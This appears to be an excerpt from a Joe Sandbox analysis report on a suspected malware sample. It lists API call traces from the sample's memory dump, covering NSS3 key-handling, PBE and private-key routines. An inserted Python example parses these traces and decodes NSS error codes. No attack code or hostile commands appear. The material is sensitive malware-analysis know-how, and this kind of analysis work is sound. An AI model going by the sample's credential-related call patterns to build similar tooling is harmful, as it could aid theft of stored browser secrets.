                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC12AD7060C3418FD714CF19C484E6ABBF2AF86318F188A5DD9D99BB51DB31E846CB82
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
                                                                                                                                                                                                                          • API String ID: 0-3593521594
                                                                                                                                                                                                                          • Opcode ID: 5444aae386b1c1956ca4bbce291b7c08c32af9fd46b49573d675359827723eb8
                                                                                                                                                                                                                          • Instruction ID: 70c3f2332e3683cd7be1ccafb7a99889834b05c428aea7eb262ce0210fa7ec44
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5444aae386b1c1956ca4bbce291b7c08c32af9fd46b49573d675359827723eb8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44438074A08361CFD304CF16C590E5ABBE2BFC9318F14966DE8998B752D731E846CB92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C4DDAE2,?), ref: 6C4DC6C2
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4DF0AE
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4DF0C8
                                                                                                                                                                                                                          • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C4DF101
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4DF11D
                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C5A218C), ref: 6C4DF183
                                                                                                                                                                                                                          • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C4DF19A
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C4DF1CB
                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C4DF1EF
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C4DF210
                                                                                                                                                                                                                            • Part of subcall function 6C4852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C4DF1E9,?,00000000,?,?), ref: 6C4852F5
  • Part of subcall function 6C4852D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C48530F
  • Part of subcall function 6C4852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C485326
  • Part of subcall function 6C4852D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C4DF1E9,?,00000000,?,?), ref: 6C485340
• SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C4DF227
  • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
• SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C4DF23E
  • Part of subcall function 6C4CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C47E708,00000000,00000000,00000004,00000000), ref: 6C4CBE6A
  • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?), ref: 6C4CBE7E
  • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEC2
• PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4DF2BB
• PR_SetError.NSS3(FFFFE006,00000000), ref: 6C4DF3A8
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
• SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C4DF3B3
  • Part of subcall function 6C482D20: PK11_DestroyObject.NSS3(?,?), ref: 6C482D3C
  • Part of subcall function 6C482D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C482D5F
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
• String ID:
• API String ID: 1559028977-0
• Opcode ID: d74b1dd5c37b331efd40521c015da10455c74cc034ef94a72a0b770dfe9ff31f
• Instruction ID: 8f25ea4c68656c7e179c69d29f09bd35bbd183f074dc28751d8b9e9ba0bbb8b4
• Opcode Fuzzy Hash: d74b1dd5c37b331efd40521c015da10455c74cc034ef94a72a0b770dfe9ff31f
• Instruction Fuzzy Hash: 2BD191B6E026059FEB24DF99D890E9EB7F5EF48308F168029D915A7711E731F806CB90
APIs
• PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6C4E7FFA,00000000,?,6C5123B9,00000002,00000000,?,6C4E7FFA,00000002), ref: 6C50DE33
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
  • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
  • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
  • Part of subcall function 6C50D000: PORT_ZAlloc_Util.NSS3(00000108,?,6C50DE74,6C4E7FFA,00000002,?,?,?,?,?,00000000,6C4E7FFA,00000000,?,6C5123B9,00000002), ref: 6C50D008
• PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6C4E7FFA,00000000,?,6C5123B9,00000002,00000000,?,6C4E7FFA,00000002), ref: 6C50DE57
• memset.VCRUNTIME140(?,00000000,00000088), ref: 6C50DEA5
• PR_SetError.NSS3(FFFFE001,00000000), ref: 6C50E069
• PR_SetError.NSS3(FFFFE001,00000000), ref: 6C50E121
• PK11_FreeSymKey.NSS3(?), ref: 6C50E14F
• PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C50E195
• PR_GetCurrentThread.NSS3 ref: 6C50E1FC
  • Part of subcall function 6C502460: PR_SetError.NSS3(FFFFE005,00000000,6C5A7379,00000002,?), ref: 6C502493
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
• String ID: application data$early application data$handshake data$key
• API String ID: 1461918828-2699248424
• Opcode ID: ef28750de841bf79874c229e47a6781a16d50e7ecf727d4a54f433801830d25a
• Instruction ID: 1544dbbd152ab4be32c6b6c89bdd2f3cae6f931d34fa216a2c69275ba2e951b6
• Opcode Fuzzy Hash: ef28750de841bf79874c229e47a6781a16d50e7ecf727d4a54f433801830d25a
• Instruction Fuzzy Hash: 48C104B1B002159BEB14CF65CC80BAAB7B4FF49318F144129E909DBA51E771E954CBE1
APIs
• TlsGetValue.KERNEL32 ref: 6C4B389F
• EnterCriticalSection.KERNEL32(?), ref: 6C4B38B3
• PR_Unlock.NSS3(?), ref: 6C4B38F1
• TlsGetValue.KERNEL32 ref: 6C4B390F
• EnterCriticalSection.KERNEL32(?), ref: 6C4B3923
• PR_Unlock.NSS3(?), ref: 6C4B3972
• TlsGetValue.KERNEL32 ref: 6C4B3996
• EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B39AE
• PR_Unlock.NSS3(?), ref: 6C4B39DB
• PR_Unlock.NSS3(?), ref: 6C4B3A16
  • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
  • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
• TlsGetValue.KERNEL32 ref: 6C4B3A36
• EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B3A4E
• PR_Unlock.NSS3(?), ref: 6C4B3A77
• PR_SetError.NSS3(00000000,00000000), ref: 6C4B3A8F
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Value$CriticalSectionUnlock$Enter$calloc$ErrorLeave
• String ID:
• API String ID: 1642523270-0
• Opcode ID: ae638e4bd765c7080aa5d2dfe0f60ba117384bbd9a2fd518311ac84bac2b3f50
• Instruction ID: 6118000e7ee5ad5eaf594f9803f90c231e712b742c6026771cc56f7b01300e75
• Opcode Fuzzy Hash: ae638e4bd765c7080aa5d2dfe0f60ba117384bbd9a2fd518311ac84bac2b3f50
• Instruction Fuzzy Hash: FC917775D002189FDB00EF69D884FAABBB4BF09318F155169EC15AB711EB30E984CBA5
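Every API-trace line in the entries above has the same shape, `Function.MODULE(args), ref: address`, with `Part of subcall function CALLER:` prefixed on nested calls and the argument list omitted where the plugin recovered none. The first argument of each `PR_SetError` call is an NSPR `PRErrorCode` printed as an unsigned 32-bit hex word (the second is the OS error, 0 throughout), so `FFFFE006` is really the negative value -8186. The Python below is an added example, not part of the Joe Sandbox report or of NSS: it parses such lines, groups calls by module and decodes the error codes against the first entries of NSS's `secerr.h` (`SEC_ERROR_BASE = -0x2000`). The regular expression and the field names are this example's own assumptions about the trace format, only a short prefix of the error table is reproduced (unknown offsets are reported as `SEC_ERROR_BASE+n` rather than guessed), and the sample lines are copied from the entries above. Because the trace prints more stack slots than `PR_SetError` takes, only the first argument is interpreted.

```python
"""Parse Joe Sandbox API-trace lines and decode NSS/NSPR error codes.

Added example for this report page; not Joe Sandbox or NSS code. The
line shape it assumes is the one visible in the entries above:

    • Function.MODULE(arg,arg,...), ref: ADDRESS
    • Part of subcall function CALLER: Function.MODULE(...), ref: ADDRESS
    • Function.MODULE ref: ADDRESS            (no argument list)
"""
import re
from dataclasses import dataclass
from typing import Optional

# Assumed trace-line format; module names may contain '-' and '.'
# (API-MS-WIN-CRT-UTILITY-L1-1-0), the argument list is optional.
TRACE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_.\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# SEC_ERROR_BASE and the first SEC_ERROR_* offsets from NSS secerr.h.
# Only a short prefix of the table is reproduced; other offsets are
# reported numerically instead of being guessed.
SEC_ERROR_BASE = -0x2000
SEC_ERROR_NAMES = {
    0: "SEC_ERROR_IO",
    1: "SEC_ERROR_LIBRARY_FAILURE",
    2: "SEC_ERROR_BAD_DATA",
    3: "SEC_ERROR_OUTPUT_LEN",
    4: "SEC_ERROR_INPUT_LEN",
    5: "SEC_ERROR_INVALID_ARGS",
    6: "SEC_ERROR_INVALID_ALGORITHM",
    7: "SEC_ERROR_INVALID_AVA",
    8: "SEC_ERROR_INVALID_TIME",
    9: "SEC_ERROR_BAD_DER",
    10: "SEC_ERROR_BAD_SIGNATURE",
}


@dataclass
class Call:
    func: str
    module: str
    args: list
    ref: int
    subcall_of: Optional[int]  # caller address on "Part of subcall" lines


def parse_line(line: str) -> Optional[Call]:
    """Return a Call for an API-trace line, or None for anything else
    (section headers, hashes, Strings xrefs)."""
    m = TRACE_RE.match(line)
    if not m:
        return None
    raw_args = m["args"]
    args = [a.strip() for a in raw_args.split(",")] if raw_args else []
    sub = int(m["sub"], 16) if m["sub"] else None
    return Call(m["func"], m["module"], args, int(m["ref"], 16), sub)


def decode_pr_error(hex_word: str) -> str:
    """Interpret a PR_SetError first argument as a signed 32-bit PRErrorCode."""
    value = int(hex_word, 16)
    if value >= 0x80000000:
        value -= 0x1_0000_0000  # the trace prints the word unsigned
    if value == 0:
        return "0 (cleared)"
    offset = value - SEC_ERROR_BASE
    if 0 <= offset < 0x1000:
        name = SEC_ERROR_NAMES.get(offset, f"SEC_ERROR_BASE+{offset}")
        return f"{value} ({name})"
    return f"{value} (outside SEC_ERROR range)"


def summarize(lines) -> dict:
    """Group parsed calls by module and decode every PR_SetError code.
    Only args[0] is decoded: the trace shows more stack slots than the
    function takes, so trailing values are not parameters."""
    calls = [c for c in (parse_line(l) for l in lines) if c]
    by_module = {}
    for c in calls:
        by_module.setdefault(c.module, []).append(c.func)
    errors = [decode_pr_error(c.args[0]) for c in calls
              if c.func == "PR_SetError" and c.args]
    return {"calls": calls, "by_module": by_module, "errors": errors}


# Sample lines copied from the trace entries above (plus one Strings entry).
SAMPLE = [
    "• PR_SetError.NSS3(FFFFE006,00000000), ref: 6C4DF3A8",
    "  • Part of subcall function 6C4852D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C4DF1E9,?,00000000,?,?), ref: 6C485340",
    "• TlsGetValue.KERNEL32 ref: 6C4B389F",
    "• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FED0A",
    "• PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C50E195",
    "• database corruption, xrefs: 6C3FF48D",  # not a call; must be skipped
]

if __name__ == "__main__":
    report = summarize(SAMPLE)
    for module, funcs in sorted(report["by_module"].items()):
        print(f"{module}: {', '.join(funcs)}")
    for err in report["errors"]:
        print("PR_SetError ->", err)
```

Run against a whole exported report, the per-module grouping quickly shows which imported libraries a function reaches (KERNEL32 TLS and critical-section primitives under NSPR locks, MOZGLUE allocators, NSS3 PK11/SECKEY routines), and the decoded `PR_SetError` values separate library-failure and invalid-algorithm paths from the `0` that clears the thread's error state.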
APIs
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FED0A
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FEE68
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FEF87
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C3FEF98
Strings
• database corruption, xrefs: 6C3FF48D
• 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3FF483
• %s at line %d of [%.10s], xrefs: 6C3FF492
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _byteswap_ulong
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 4101233201-598938438
                                                                                                                                                                                                                          • Opcode ID: 285ccd160ee4a9d34fa76abc9c69d73c58e9f9596c1e55a52dd1d4e0f6b08f88
                                                                                                                                                                                                                          • Instruction ID: 4cad550ff367a7828ddf79b4d511e18fe4c2b9c9049de29dd9b5e2141a5aaa24
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 285ccd160ee4a9d34fa76abc9c69d73c58e9f9596c1e55a52dd1d4e0f6b08f88
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0362F334A043458FDB04CF64C880B9ABBF1BF49318F184999D8655BB92D776E887CFA1
APIs
• SECOID_FindOID_Util.NSS3(?), ref: 6C497DDC
  • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
  • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
  • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
  • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
• SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C497DF3
• PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C497F07
• PK11_GetPadMechanism.NSS3(00000000), ref: 6C497F57
• PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C497F98
• PK11_FreeSymKey.NSS3(?), ref: 6C497FC9
• SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C497FDE
• PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C498000
  • Part of subcall function 6C4B9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C497F0C,?,00000000,00000000,00000000,?), ref: 6C4B943B
  • Part of subcall function 6C4B9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C4B946B
  • Part of subcall function 6C4B9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C4B9546
• SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C498110
• PK11_FreeSymKey.NSS3(00000000), ref: 6C49811D
• PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C49822D
• SECKEY_DestroyPublicKey.NSS3(?), ref: 6C49823C
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
• String ID:
• API String ID: 1923011919-0
• Opcode ID: 3d1124ec9153cc42975f9aaf5cee9d1dd213df5c75a9bfdd5ace135cfb3653bd
• Instruction ID: 3d6cabd613790614b46582de1963f51f220e246dab9f8b21b7d24ccd2387368f
• Opcode Fuzzy Hash: 3d1124ec9153cc42975f9aaf5cee9d1dd213df5c75a9bfdd5ace135cfb3653bd
• Instruction Fuzzy Hash: 0DC152B1D442699BEF21CF14CC40FDABBB9AF15348F0081E9E91DA6641E7319E85CFA1
APIs
• EnterCriticalSection.KERNEL32(?,?,00000002,?,6C52CF46,?,6C3FCDBD,?,6C52BF31,?,?,?,?,?,?,?), ref: 6C40B039
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31), ref: 6C40B090
• sqlite3_free.NSS3(?,?,?,?,?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31), ref: 6C40B0A2
• CloseHandle.KERNEL32(?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31,?,?,?,?,?,?,?,?,?), ref: 6C40B100
• sqlite3_free.NSS3(?,?,00000002,?,6C52CF46,?,6C3FCDBD,?,6C52BF31,?,?,?,?,?,?,?), ref: 6C40B115
• sqlite3_free.NSS3(?,?,?,?,?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31), ref: 6C40B12D
  • Part of subcall function 6C3F9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C40C6FD,?,?,?,?,6C45F965,00000000), ref: 6C3F9F0E
  • Part of subcall function 6C3F9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C45F965,00000000), ref: 6C3F9F5D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
• String ID: `Xl
• API String ID: 3155957115-2906863447
• Opcode ID: 9e7e13960ee60444cd0230765f6eef5c2bd0ea210cdb44b6913bbbd189f276c5
• Instruction ID: 99099527c63fbb061568726c3277ef77c8bda0216a9976a7704aa908567d0837
• Opcode Fuzzy Hash: 9e7e13960ee60444cd0230765f6eef5c2bd0ea210cdb44b6913bbbd189f276c5
• Instruction Fuzzy Hash: AD91BAB0B442068FEB04CF24C884F6AB7B1FF45309B154A3DE4169BB50EB34E981CB99
APIs
• PK11_PubDeriveWithKDF.NSS3 ref: 6C4A0F8D
• SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C4A0FB3
• PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C4A1006
• PK11_FreeSymKey.NSS3(?), ref: 6C4A101C
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4A1033
• SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4A103F
• PK11_FreeSymKey.NSS3(00000000), ref: 6C4A1048
• memcpy.VCRUNTIME140(?,?,?), ref: 6C4A108E
• SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C4A10BB
• memcpy.VCRUNTIME140(?,00000006,?), ref: 6C4A10D6
• memcpy.VCRUNTIME140(?,?,?), ref: 6C4A112E
  • Part of subcall function 6C4A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C4A08C4,?,?), ref: 6C4A15B8
  • Part of subcall function 6C4A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C4A08C4,?,?), ref: 6C4A15C1
  • Part of subcall function 6C4A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4A162E
  • Part of subcall function 6C4A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4A1637
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1510409361-0
                                                                                                                                                                                                                          • Opcode ID: 3dd8b16757146c2e012579e9a4c98325792c97e4cb908736411145253bdf1af3
                                                                                                                                                                                                                          • Instruction ID: 2c40c2aa05501ae4cc48840da4baa43e46b3682fb29e5a46d253667e6808e001
